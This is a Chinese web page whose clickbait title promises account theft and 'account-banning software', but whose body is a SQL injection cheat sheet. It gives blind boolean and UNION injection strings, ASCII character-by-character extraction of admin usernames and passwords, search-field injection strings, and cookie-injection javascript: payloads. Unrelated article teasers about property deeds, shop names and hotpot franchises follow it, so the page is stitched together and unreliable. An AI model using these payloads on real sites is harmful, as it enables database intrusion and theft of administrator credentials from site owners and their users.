黑客教你3分钟盗抖音(免费封号神器封号软件抖
猜解表名:
and exists (select * from 表名)
猜解列名:
and exists (select 字段 from 表名)
UNION法:
联合查询:
select name,password,id from user union select user,pwd,uid from
爆指定表名内容:
and 1=1 union select 1,2,3,4,5 from 表名
ASCII逐字解码法:
1、猜解列长度
猜解语句:
and (select top 1 len(列名)from 表名)>N
and (select top 1 len(列名)from 表名)=N
其中N是数字,变换这个N的值猜解列长度,例如:
and (select top 1 len(列名)from 表名)>1
and (select top 1 len(列名)from 表名)>6
如果一直猜到6都显示正常页面,猜到7的时候返回错误(大于6并且小于等于7),那么该列的长度为7。因为“top 1”的意思是把最靠前的1条记录给提取出来,所以如果要猜解第二条记录就该使用:
select top 1 len(列名) from 表名
where 列名 not in (select top 1 列名 from 表名)
2、ASCII码分析法猜解用户和密码
ASC()函数和Mid函数
例如:mid(列名,N,1)
ASC(mdi(列名,N,1))得到“列名”第N位字符ASCII码
猜解语句为:
and (select top 1 asc(mid(字段,1,1)) from 数据库名)=ASC码(通过转换工具换)
区间判断语句:
“......between......and......”
中文处理法:
当ASCII转换后为“负数”使用abs()函数取绝对值。
例:and (select top 1 abs(asc(mid(字段,1,1))) from 数据库名)=ASC码(通过转换工具换)
ASCII逐字解码法的应用:
1、猜解表名:
and (select count(*) from admin)<>0
2、猜解列名:
and (select count(列名) from 表名)<>0
3、猜解管理员用户个数:
and (select count(*) from 表名)=1
返回正常,表中有一条记录。
4、猜解管理员用户名的长度:
and (select len(列名) from 表名)>=1、>=2、>=3、>=4。
5、猜解管理员用户名:
and (select count(*)from 表名 where (asc(mid(列名,1,1))) between 30 and 130)<>0
最后提交:
and (select asc(mid(列名,1,1)) from 表名)=ascii的值
6、猜解管理员的密码:
按照上面的原理,只要把上面的语句中(asc(mid(列名,1,1)的列名换成PASSWORD就能得到管理员的密码了。
搜索型注入漏洞利用猜解语句:
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
将and 1=1 换成注入语句就可以了。
cookie注入语句:
javascript:alert(document.cookie="id=" escape("44 and 1=1"));
javascript:alert(document.cookie="id=" escape("44 and 1=2"));
猜解语句:
猜解长度:
javascript:alert(document.cookie="id=" escape("44 and (select len(password) from admin)=16"))
猜解内容:
javascript:alert(document.cookie="id=" escape("44 and (select asc(mid(username)) from admin)=97"))
相关文章
苹果与安卓手机一个微信号可以同时登录两个手
1 .设置严密权限上传目录只给写入、读取权限绝对不能给执行权限每个网站WebSite使用独立用户名和密码权限设置为Guest命令: net localgroup users myweb /del设置M...
房产知识:在哪里办房产证 买新房是自己去办房
相信现在有很多的朋友们对于在哪里办房产证 买新房是自己去办房产证还是开发商给办好都想要了解吧,那么今天小编就来给大家针对在哪里办房产证 买新房是自己去办房产证还是开发商给办好进行一个介绍吧,希望小编介...
淘宝网店起名名字大全,这样起名字生意好得不
在网购飞速发展的现在,网上开店的店主是越来越多,如何从众多的网店中杀出重围,让客户找到你,如何给网店取有寓意的名字?成为了一个困扰店主的问题。 店铺名和宝贝标题是非常重要的,取个有寓意又好听的网...
洋洋洒洒是什么意思(曹植一首诗洋洋洒洒写400字)
飘飘洒洒代表什么意思(曹植一首诗飘飘洒洒写400字)这时他的《滕王阁序》早已遍及了紫禁城的街头巷尾。噩耗传来,文学界为之一震,连那趾高气昂的唐高宗李治都三叹遗憾。 王勃 由于英年早逝,王勃存在的诗词作...
荣家牧场鲜菜火锅可以加盟吗?可以加盟的好项目
暖锅行业一直以来都是餐饮行业中最火爆的行业之一,不管是家庭小聚,照旧亲戚伴侣集会,不管是公司员工会餐,照旧学生结业会,不管是大人照旧小孩,暖锅行业在个中都是必选项之一,所以也就使得很多的加盟投资商都来...
seo优化是干嘛的(seo运营的几个注意事项)
什么是SEO网络推广?是很大一部分刚进入SEO行业的时候最头痛的事情,于是就会到淘宝去购买各种教程进行学习,在学习的途中发现购买的教程都是过时的了,于是问题就来了:什么是SEO网络推广,在了解什么是S...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!